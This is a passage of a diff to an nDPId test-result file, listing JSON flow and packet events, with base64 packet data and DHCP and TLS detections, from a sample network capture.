-02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAXcDK5AADMGDHZ36+tUwKgFEAG70J5BKvaX5fLLP1AQABsvzwAAgAIAAgAAAFMAAAANAABiYMcwiMXQzMiMgQcmWlJZkMqglFhQAPR2YgnQQP0K3ZKMosy0EuvkjMSi4tQS29AQN10LsmxnBTJKihm4DE3MDQwNTEwMjQAAAAD\/\/wAAAA0BAAZkbQ8Sj7Oe9PiiwBDc+0M3qnjgDK8RRxC4wMkMm6VV91C1Te+ybrzRLmHpyrK4bZavXIwADOQ6snm8v2H2p2SpH6m06PqK2eSoERX3TNfq7vb1Pveo7PONT9TnUXjkgVt2M1UumsUWGrLgq2GUvlzXvOPLaIXh2WGGxaNQtz1jFVdY+0zrpxEqy\/jQWU3QaN8euscIrVLF\/pkwWAOQct9fJHfuNC\/MfpPEwL\/1AnsUcAaC8\/sfjjx5DIP3T5+kLB\/ky5nWDGzJudLxL39BV679cN3TMGGwCiDjz8BUbsetnqmdz5nZf4AwUpqUBbDH0YbukYFxFpgWx1VK0Ft6NyauHZR77Fn6jjWPJxfrizISaNJJAw2Tqy9duTjvZ6O6coJr6d9MtTXf5qsYx+0KeK8uO221KMufGGsvUAI4YCgvPXVdW0lbCdk\/UWdvQk27qxkaA0bMmmtaoIM\/NdoPPcwHfYUfdLkSeX9aftPdhgNudr\/W5u4Rq9JCuxr+xSmkqaDqd6gSKkqRzGlbbbrcGyF7WGk\/8cG1vc2UHan62LkAAzJEJRwjhuFaCDyVcgr9Hf+VOCu\/WbKVvxixWZOd0y0FbTEIYK9xEk19sHm0uVaBKIvOw8BvnHM4ZoE15rgdy9cOuctKEI63utAOFOf2mQnsx+xGkU5azbbGL0YjiKG9XwO74XxdztUwcLqPr0\/JJmPPgPFoGSWqsm9ugxiAf+6FK5eJomztrl11jHLqcqmSu0amZJ2vzsr+HQ1yaBS8xhtHAlRjYL9oIKpApKM94hPIcq8aaGJEtzamTcDbtBQ1sMPcUE+yUtiBPrlnO9Nwt\/CiYfwjXLhAc57Nmo6vBWzUjss7w\/7Wb9k3zYdX1OxZgy1kvrBuG2WVHzF+IQ9Fq\/pk0IvbsQWQO2qMcnqAwwXAN5zFvFMTcfpV\/GRa6Cvc8ELP86S69D9ZpljWsaAmgFvinMLKj5eAujG5SXpnROjWsWKDhRiTv5p7M\/QvQ5PgsvnxYxwzTtmPmwT4v+9UIamloL6aH4y9ceyGZvFPH\/jOWhlPoGpWSmL8FxzRX8I0ZOH5h7GitpswaZPQenRLegoX\/pJNP3pcJ4kvc\/7oBU9eKhNCbKNIMLr0J2sgbcuo5DzP6xW+1KJlTpJay9bl5Pl0VPdVfr53CYdTOnDLEPtQAs8TDIA8+qWO4m2hTbvXTydzx3h6dgKZjr70r80ubfEhXRuxkxseun6pvNvpxyma0gxSfUYbMbRpJsPfd1POQDYxd1WsmLeynpzweBtMB4CyWpE7em97ncQfT+1jYPiU4C8h442mV+2iNebysC3+tj1kSc3iredU54VVSYsYiDJCTKDt1B72wPesWWs8H1oh07d+p8n6q\/HM+0on3oN8mliBSXdA4qo8xl+PnHCuSiNIcO9F46tn+Si8KqAsE1CoyxalnbQ2XoJdnf\/XNWrUBFQvGpTm8cA2xt6y\/B14Mse3ha6wLlYiZQnR\/q6to9f77axqkMdPEZxW8P1dQkKPv6RSZjX5So+geIVQBTjCtJ438tTlN+BBHx3i57FI5d8+OwESi4EeyLHH\/WufGNcvXF2wAiF6MIh3TqZipTbK\/sfxI05ZUV2K0zFjDFs3q+4O\/gCdO\/GR8NpL14qmcLw4hj2DUzElDJ7z58du\/sTLY9PL12tg2\/g4c+maPg6xMQhEEJZZ2fr0StLQ4dC8yRSCQ5AlLS4oj7J42WuPepbvvAkbIdKlT+5AXzJDvxJIA\/K5zy\/vGwU1kziWNYRVpFmlobTG1I2P3poiceReoPCxgxmEbNKxlIyxGeOkbT03xrhCy3M="} -00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAE7DK9AADMGERZ36+tUwKgFEAG70J5BKvxL5fLLP1AYABuy+gAAjZPukZZc5XVgQ9kkDb42wAG2R4wZPZK09D+mhXOPeysHqbaxc2ukLB7O\/ZQd+BiMnHFH7zgcREAoK8LsJtF9H0HTuFW4zAQpKNlDl6pGtEpiOY1HdxQ1Bv0HkLtvfY7Kkq4QCv1lSYlKLAPMR+Oc9r2t96JVS9ceghm\/Wm9DKfghBx740ADnGdTcU2OF\/8x6UPEOuW6wwYjs3Pb+yZn6sRfXdwloMkU3kuWbA\/HnEcEyg9N63JYWRugH0gCb7wJDNCrha78dJpq+nOGbkegYKzSRi8MebnxJxxwLRQs3jpRKSRVmH0ihWT6Ua9H97Rj8GCDKcrs8+ASvsIB+r3MFWznlQzQS834owopgMgpZRwgoXAU="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104410885,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoSVVAAEAGyILAqAUQd+vrVNCeAbvl8ss\/QSr9XlAQHmimXgAAAAAAAAAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAXcDK5AADMGDHZ36+tUwKgFEAG70J5BKvaX5fLLP1AQABsvzwAAgAIAAgAAAFMAAAANAABiYMcwiMXQzMiMgQcmWlJZkMqglFhQAPR2YgnQQP0K3ZKMosy0EuvkjMSi4tQS29AQN10LsmxnBTJKihm4DE3MDQwNTEwMjQAAAAD\/\/wAAAA0BAAZkbQ8Sj7Oe9PiiwBDc+0M3qnjgDK8RRxC4wMkMm6VV91C1Te+ybrzRLmHpyrK4bZavXIwADOQ6snm8v2H2p2SpH6m06PqK2eSoERX3TNfq7vb1Pveo7PONT9TnUXjkgVt2M1UumsUWGrLgq2GUvlzXvOPLaIXh2WGGxaNQtz1jFVdY+0zrpxEqy\/jQWU3QaN8euscIrVLF\/pkwWAOQct9fJHfuNC\/MfpPEwL\/1AnsUcAaC8\/sfjjx5DIP3T5+kLB\/ky5nWDGzJudLxL39BV679cN3TMGGwCiDjz8BUbsetnqmdz5nZf4AwUpqUBbDH0YbukYFxFpgWx1VK0Ft6NyauHZR77Fn6jjWPJxfrizISaNJJAw2Tqy9duTjvZ6O6coJr6d9MtTXf5qsYx+0KeK8uO221KMufGGsvUAI4YCgvPXVdW0lbCdk\/UWdvQk27qxkaA0bMmmtaoIM\/NdoPPcwHfYUfdLkSeX9aftPdhgNudr\/W5u4Rq9JCuxr+xSmkqaDqd6gSKkqRzGlbbbrcGyF7WGk\/8cG1vc2UHan62LkAAzJEJRwjhuFaCDyVcgr9Hf+VOCu\/WbKVvxixWZOd0y0FbTEIYK9xEk19sHm0uVaBKIvOw8BvnHM4ZoE15rgdy9cOuctKEI63utAOFOf2mQnsx+xGkU5azbbGL0YjiKG9XwO74XxdztUwcLqPr0\/JJmPPgPFoGSWqsm9ugxiAf+6FK5eJomztrl11jHLqcqmSu0amZJ2vzsr+HQ1yaBS8xhtHAlRjYL9oIKpApKM94hPIcq8aaGJEtzamTcDbtBQ1sMPcUE+yUtiBPrlnO9Nwt\/CiYfwjXLhAc57Nmo6vBWzUjss7w\/7Wb9k3zYdX1OxZgy1kvrBuG2WVHzF+IQ9Fq\/pk0IvbsQWQO2qMcnqAwwXAN5zFvFMTcfpV\/GRa6Cvc8ELP86S69D9ZpljWsaAmgFvinMLKj5eAujG5SXpnROjWsWKDhRiTv5p7M\/QvQ5PgsvnxYxwzTtmPmwT4v+9UIamloL6aH4y9ceyGZvFPH\/jOWhlPoGpWSmL8FxzRX8I0ZOH5h7GitpswaZPQenRLegoX\/pJNP3pcJ4kvc\/7oBU9eKhNCbKNIMLr0J2sgbcuo5DzP6xW+1KJlTpJay9bl5Pl0VPdVfr53CYdTOnDLEPtQAs8TDIA8+qWO4m2hTbvXTydzx3h6dgKZjr70r80ubfEhXRuxkxseun6pvNvpxyma0gxSfUYbMbRpJsPfd1POQDYxd1WsmLeynpzweBtMB4CyWpE7em97ncQfT+1jYPiU4C8h442mV+2iNebysC3+tj1kSc3iredU54VVSYsYiDJCTKDt1B72wPesWWs8H1oh07d+p8n6q\/HM+0on3oN8mliBSXdA4qo8xl+PnHCuSiNIcO9F46tn+Si8KqAsE1CoyxalnbQ2XoJdnf\/XNWrUBFQvGpTm8cA2xt6y\/B14Mse3ha6wLlYiZQnR\/q6to9f77axqkMdPEZxW8P1dQkKPv6RSZjX5So+geIVQBTjCtJ438tTlN+BBHx3i57FI5d8+OwESi4EeyLHH\/WufGNcvXF2wAiF6MIh3TqZipTbK\/sfxI05ZUV2K0zFjDFs3q+4O\/gCdO\/GR8NpL14qmcLw4hj2DUzElDJ7z58du\/sTLY9PL12tg2\/g4c+maPg6xMQhEEJZZ2fr0StLQ4dC8yRSCQ5AlLS4oj7J42WuPepbvvAkbIdKlT+5AXzJDvxJIA\/K5zy\/vGwU1kziWNYRVpFmlobTG1I2P3poiceReoPCxgxmEbNKxlIyxGeOkbT03xrhCy3M="} +00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1470104410885,"pkt":"ABxCjnAxTF4M6gNlCABFAAE7DK9AADMGERZ36+tUwKgFEAG70J5BKvxL5fLLP1AYABuy+gAAjZPukZZc5XVgQ9kkDb42wAG2R4wZPZK09D+mhXOPeysHqbaxc2ukLB7O\/ZQd+BiMnHFH7zgcREAoK8LsJtF9H0HTuFW4zAQpKNlDl6pGtEpiOY1HdxQ1Bv0HkLtvfY7Kkq4QCv1lSYlKLAPMR+Oc9r2t96JVS9ceghm\/Wm9DKfghBx740ADnGdTcU2OF\/8x6UPEOuW6wwYjs3Pb+yZn6sRfXdwloMkU3kuWbA\/HnEcEyg9N63JYWRugH0gCb7wJDNCrha78dJpq+nOGbkegYKzSRi8MebnxJxxwLRQs3jpRKSRVmH0ihWT6Ua9H97Rj8GCDKcrs8+ASvsIB+r3MFWznlQzQS834owopgMgpZRwgoXAU="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1470104410885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104410885,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoSVVAAEAGyILAqAUQd+vrVNCeAbvl8ss\/QSr9XlAQHmimXgAAAAAAAAAA"} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1470104410914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104410914,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsew8LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgKoAAYABAAXABg="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104411327,"flow_last_seen":1470104411327,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104411327,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1470104411327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104411327,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7YAAAERvzfAqAUl4AAA\/NTqFOsAIqEiFTIAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} @@ -439,31 +439,31 @@ 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1470104413679,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413679,"pkt":"\/\/\/\/\/\/\/\/SNIkYwreCABFAAFIfjcAAEARNZ3AqAUp\/\/\/\/\/wBEAEMBNOoXAQEGAAJEmkEAAIAAwKgFKQAAAAAAAAAAAAAAAEjSJGMK3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBSNIkYwreDAhrZXZpbi1QQzwITVNGVCA1LjA3DQEPAwYsLi8fIXn5K\/z\/AAAAAAAAAAAAAAAA"} 00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104413679,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"kevin-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1470104413815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104413815,"pkt":"TF4M6gNlYMVHBbyMCABFAAFIqYMAAEAR0r\/AqAUQwKh3AQBEAEMBNFvwAQEGABeXwM0AAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1159,"pkt_l4_len":1125,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAAR5Xv9AAEAGm5bAqAUQHw1XJNFMAbv8UmzuBJ2iMIAYEABHkgAAAQEIChoPmUJf7iUmFwMDBEAsTuFq8CapSbqPXvcdxKrSs42tBtoxpkpEhbC8nI\/Z9Ti9iLIQZa5j5LW58IaLnxvFb3pZI+B1RxFJh1MX7hfwSESpGA\/xdeEaXYqNDQOsIrAzCG5XHIwlKsfFfn\/8RQrusMspya+fP6t\/Zg2Y6qSh9wcmn8mXJja+baLib9aevB6ce5XBs3a64vsRCgFs5NXASh55KEqD8yMaqdrRhlWFE6xGr6+SpmMLlVUwh48nOg1sBDe\/WYgSpLNk63+28tyTAwCIcOk3y10vOsyt7ZjgvztDnWOLtsn7\/6kMi3u2RdUB7eGGzM2NovPfgy\/qKgW2LAn44liW9WewObR4bp+dPFEvC0Y3+SW5bib2uvhBosFVLRK5YrZcwALZJXqqXhrrs6bu\/ljawzwGUMfLGQ2WSbwafdg9dJ73rdMEF1vEvfkETGUyJeWyPgg2G2DdxVtAlhAOni2Cb6JW3jV3kUvfm9gPSADxqT1QqjMQAvLuAsUt5WChMz4yp18RafOK\/1ZUrwxEzqELsHqkpHQf4ILnKSgg5+kGWAcGpm5BV27qLCy+WyMYEnVR9nevFTvw2OV3haLNTqpyfd4K7vOAMw+dbscVa9MHAeqcd7IQnXV8FbWdFXkC4wCM4E8hTvbfJf2QumZQ2fXLtiYd3sw8qoFpqMjmllDchFzska7DS7GVif4h6CnDNlZ4V+i1Eng9ELpwqlbXjyiEgMAhv7fPmI8e61K\/2gGY8OMdxcNsyD40PLGc9n2gJgcjUdhv3yk5lS0wyxma1JJ1Pa0sEMzvHL8CT6BpEzwkMJEMkciKtJ6VsJyummJhpN5MU9bS0CfSvwU0ARZvT+jD4m9Xd2enHnLuDwg4KR5SAhfN1vXfVfNlzPARDhSaBSDDpj8POKqEg5amwWHcBAQbXCOcOftYxPyyUfYlmBS91ssyfM9KHAYAPjuptOjnLxGz2x9TbNHcI4nTKruVWTV9ktQaEfrdpb\/HDqnCQBNGReenZ\/zWZ\/GfJml4Cm+qteZq9C64lEHb9+XokUZOr8X2s3gyZpMYfRa5jmhmO9xmHg7WJrK4eIDuKfpKwBJ058yTVyD7l0KDSW9GneGAGkjet6prc4idVI6G79csJZdQxaibq52QgAy0phRLTPkicoq0gLlZcIZm+Mml46cJhhEv0H26dA+KCoM5R5DwKEyBjuFs1QF3Y4+SDB+bc1Wt792AR8qtKWp6gbS96vJnCeIhTEA3KFLfapTzgvIE4vSB7KreGQj+tnmHbTp1DHeV+7y4PmFv5on7p4A6CEwD6f6fjePEHDfs2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"} -01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 